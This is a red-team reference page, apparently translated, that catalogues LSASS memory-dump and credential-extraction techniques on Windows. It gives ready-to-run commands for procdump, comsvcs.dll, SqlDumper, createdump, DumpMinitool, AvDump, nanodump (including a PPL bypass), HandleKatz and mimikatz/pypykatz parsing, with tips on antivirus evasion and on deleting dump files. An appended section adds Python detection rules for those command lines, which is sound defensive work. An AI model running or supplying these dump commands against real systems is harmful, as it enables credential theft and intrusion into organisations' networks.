[Red Team Library] 06 Credential

Credential

6.1 Summary of LSASS process dump methods

  1. procdump: dump memory to a .dmp file

procdump64.exe -accepteula -ma lsass.exe C:\programdata\lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

  2. sqldumper: dump memory to a .dmp file
  • Method 1:

tasklist /svc |findstr lsass.exe
sqldumper.exe [lsass PID] 0 0x01100

  • Method 2:

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sqldumper.exe %i 0 0x01100

  • Read the .mdmp file with mimikatz:

mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

  3. avdump64: dump memory to a .dmp file

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do powershell -c ".\AvDump_64.exe --pid %i --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file c:\programdata\lsass.dmp"

  4. .NET createdump: dump memory to a .dmp file

.NET 5 download URL
https://download.visualstudio.microsoft.com/download/pr/f05c10fe-fed3-43b6-b676-ff75021c2d9f/15cab750af61a29d70ef33c265354cf2/dotnet-runtime-5.0.3-win-x64.exe

Path after a successful installation
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe

# look up the lsass process PID
tasklist /svc | findstr lsass

# obtain SYSTEM privileges
PsExec.exe -s -i -d cmd.exe

"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe"  -u -f C:\programdata\lsass.dmp pid

PowerShell can produce the dmp file directly:
powershell -c ".\createdump.exe -u -f lsass.dmp pid"

  5. comsvcs.dll: dump memory to a .dmp file

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\programdata\lsass.dmp full"

  • comsvcs.dll, looking up the lsass PID automatically:

for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do powershell -c "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %B lsass.dmp full"

  6. DumpMinitool: dump memory to a .dmp file
  • Ships with Visual Studio 2022, Microsoft-signed, not flagged by AV

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do DumpMinitool.exe --file 1.txt --processId %i --dumpType Full

  7. SharpDump: dump memory to a .dmp file

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sharpDump.exe %i

  8. GitHub tools for dumping memory to a .dmp file

https://github.com/codewhitesec/HandleKatz

https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump

https://github.com/helpsystems/nanodump

https://twitter.com/mrd0x/status/1460597833917251595 dump64.exe

https://github.com/itm4n/PPLdump

6.2 LSA dump roundup

Decrypt LSASS memory

# mimikatz
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords full

Export hashes with wce

# Only supports Windows XP, 2003, Vista, 7, 2008 and Windows 8
wce.exe -o file.txt
wce.exe

Procdump

# administrator cmd
procdump  -accepteula -ma lsass.exe lsass_dump

procdump -accepteula -ma 720 lsass.dmp

comsvcs.dll

# run from PowerShell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass.dmp full

# clean up
Remove-Item $env:TEMP\lsass.dmp -ErrorAction Ignore

dumpert

# exe
Outflank-Dumpert.exe

# dll
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Task Manager dump


mimikatz

# cmd
mimikatz.exe "sekurlsa::minidump lsass.dump" "sekurlsa::logonpasswords full" exit

pypykatz

# python3
pip install pypykatz

# Parsing minidump file of the LSASS process:
# decrypt from the dmp file
pypykatz lsa minidump <minidump file>

# Dumping LIVE system LSA secrets:
pypykatz live lsa

volatility3

# install
https://github.com/volatilityfoundation/volatility3/releases/download/v2.0.1/volatility3-2.0.1-py3-none-any.whl
python3 -m pip install -U volatility3-2.0.1-py3-none-any.whl

# usage
vol -f xxx.dmp -o 111.txt

Out-Minidump.ps1

import-module Out-Minidump.ps1
get-process lsass | Out-Minidump

Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore

dump64.exe

A LOLBin: C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\

"C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe" <pid> c:\users\zteam\Desktop\out.dmp

SqlDumper.exe

A LOLBin: C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe

# Full dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x01100

# Mini-dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x0120

# Mini-dump file that includes indirectly referenced memory.
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x0128

# Filtered dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x8100

nanodump

https://github.com/helpsystems/nanodump

# fork
beacon> nanodump --fork --write C:\lsass.dmp

# MalSecLogon
beacon> nanodump --malseclogon --dup --fork --binary C:\Windows\notepad.exe --valid

# ppl bypass
beacon> nanodump_ppl -v -w C:\Windows\Temp\lsass.dmp

HandleKatz

https://github.com/codewhitesec/HandleKatz

loader.exe --pid:744 --outfile:dump.obfuscated

The loader needs some modification of your own.

DumpMinitool

Another LOLBin: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

DumpMinitool.exe --file c:\users\public\111.txt --processId 744 --dumpType Full

# decode
python3 Decoder.py -input dump.obfuscated -output 111.txt

# can then be read with pypykatz
pypykatz lsa minidump 111.txt

AvDump

AvDump.exe is a program bundled with Avast antivirus that can dump the memory of a specified process (lsass.exe); it carries Avast's digital signature.

AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

MirrorDump

https://github.com/CCob/MirrorDump

No local DLL support required.
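As an added defender-side example that is not part of the original page, the Python below turns the dump command lines catalogued in 6.1 and 6.2 (procdump, comsvcs.dll MiniDump, SqlDumper, createdump, DumpMinitool, AvDump, dump64, Out-Minidump) into detection rules and runs them, together with a Sysmon ProcessAccess (EID 10) access-mask check, over constructed Sysmon-style events; the allowlist and the sample events are assumptions.

```python
import re
# Command-line patterns for the dump tools catalogued on this page (matched lower-cased).
CMDLINE_RULES = [
    ("procdump_lsass", re.compile(r"procdump(64)?\b.*\s-ma\b.*\blsass")),
    ("comsvcs_minidump", re.compile(r"comsvcs\.dll\s*,?\s*minidump\b")),
    ("sqldumper", re.compile(r"sqldumper\b.*\s0\s+0x[0-9a-f]+")),
    ("createdump", re.compile(r"createdump\b.*\s-f\s")),
    ("dumpminitool", re.compile(r"dumpminitool\b.*--processid\b")),
    ("avdump", re.compile(r"avdump(_64)?\b.*--dump_file\b")),
    ("dump64", re.compile(r"\bdump64\.exe\b")),
    ("out_minidump", re.compile(r"out-minidump\b")),
]
# Sysmon EID 10 (ProcessAccess): a handle to lsass carrying PROCESS_VM_READ can read credentials.
PROCESS_VM_READ = 0x0010
# Assumed allowlist of legitimate lsass readers; tune it per environment.
LSASS_READER_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
def match_dump_cmdline(command_line):
    """Return the name of the first rule the command line hits, or None."""
    lowered = command_line.lower()
    for name, pattern in CMDLINE_RULES:
        if pattern.search(lowered):
            return name
    return None

def is_suspicious_lsass_access(event):
    """True for an EID 10 event where a non-allowlisted image opened lsass.exe with VM_READ."""
    if event.get("EventID") != 10 or not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in LSASS_READER_ALLOWLIST:
        return False
    return bool(int(event.get("GrantedAccess", "0x0"), 16) & PROCESS_VM_READ)

def triage(events):
    """Return (event index, reason) for every event that hits a rule."""
    hits = []
    for i, ev in enumerate(events):
        reason = match_dump_cmdline(ev.get("CommandLine", "")) if ev.get("EventID") == 1 else None
        if reason or is_suspicious_lsass_access(ev):
            hits.append((i, reason or "lsass_vm_read"))
    return hits

# Constructed sample events (not real telemetry): two command lines from this page, one benign, two EID 10.
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\programdata\lsass.dmp"},
    {"EventID": 1, "CommandLine": r'powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\programdata\lsass.dmp full"'},
    {"EventID": 1, "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\DumpMinitool.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
]
```

Command-line matching misses renamed or in-memory tools such as nanodump, HandleKatz or MirrorDump, so the EID 10 access-mask check is the part that generalises; expect to tune the allowlist against your EDR and backup agents before alerting on it.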
